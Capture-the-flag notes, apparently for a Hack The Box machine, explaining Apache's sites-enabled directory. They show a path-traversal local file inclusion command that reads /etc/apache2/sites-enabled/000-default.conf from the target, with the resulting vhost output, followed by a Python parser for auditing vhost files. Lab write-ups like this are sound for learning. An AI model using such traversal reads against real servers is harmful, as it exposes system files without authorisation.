apache

1. Common directories

1.1. sites-enabled

The /etc/apache2/sites-enabled/ directory holds the virtual host configurations that Apache2 has enabled. It usually contains:

/etc/apache2/sites-enabled/
├── 000-default.conf        ← default HTTP (port 80) virtual host
├── default-ssl.conf        ← default HTTPS (port 443) virtual host (if SSL is enabled)
└── hackfail.htb.conf       ← custom site configuration (named after the site's domain)

We can read 000-default.conf through the LFI; it contains the document root configuration of the website.

┌──(root㉿kali)-[~/Desktop/htb/SYNACKTIV]
└─# python lfi.py ../../../../../../../..//etc/apache2/sites-enabled/000-default.conf


<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        ErrorLog /error.log
        CustomLog /access.log combined
</VirtualHost>
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName dev.hackfail.htb
        DocumentRoot /var/www/blog_dev/public

        <Directory "/var/www/blog_dev/public">
                AllowOverride All
        </Directory>
</VirtualHost>
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName hackfail.htb
        DocumentRoot /var/www/blog/public

        <Directory "/var/www/blog/public">
                AllowOverride All
        </Directory>
</VirtualHost>
  • DocumentRoot (default site): /var/www/html
  • /var/www/blog_dev/public (development site)
  • /var/www/blog/public (production site)
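
The same inventory can be produced on the server side when auditing what a vhost file exposes. The parser below is an added example, not part of the original notes; the function names parse_vhosts and override_all_dirs are hypothetical, and the sample input is constructed from the blocks shown above. It maps each VirtualHost to its ServerName and DocumentRoot and lists the directories configured with AllowOverride All.

```python
import re

# Constructed sample: two of the <VirtualHost> blocks shown above, shortened.
SAMPLE = """\
<VirtualHost *:80>
        DocumentRoot /var/www/html
</VirtualHost>
<VirtualHost *:80>
        ServerName dev.hackfail.htb
        DocumentRoot /var/www/blog_dev/public
        <Directory "/var/www/blog_dev/public">
                AllowOverride All
        </Directory>
</VirtualHost>
"""

def parse_vhosts(text):
    """Return one dict per <VirtualHost> block in an Apache config string."""
    vhosts, current, directory = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if m := re.match(r'<VirtualHost\s+([^>]+)>', line, re.I):
            current = {"listen": m.group(1).strip(), "server_name": None,
                       "document_root": None, "allow_override": {}}
        elif current is None:
            continue  # directive outside any vhost block
        elif re.match(r'</VirtualHost>', line, re.I):
            vhosts.append(current)
            current, directory = None, None
        elif m := re.match(r'<Directory\s+"?([^">]+)"?\s*>', line, re.I):
            directory = m.group(1).strip()
        elif re.match(r'</Directory>', line, re.I):
            directory = None
        else:
            key, value = (line.split(None, 1) + [""])[:2]
            key, value = key.lower(), value.strip().strip('"')
            if key == "servername":
                current["server_name"] = value
            elif key == "documentroot":
                current["document_root"] = value
            elif key == "allowoverride" and directory:
                current["allow_override"][directory] = value
    return vhosts

def override_all_dirs(vhosts):
    """Directories where .htaccess files may override any directive."""
    return [d for v in vhosts for d, a in v["allow_override"].items() if a.lower() == "all"]
```

A vhost without a ServerName comes back with server_name set to None, which marks the default site for that listen address.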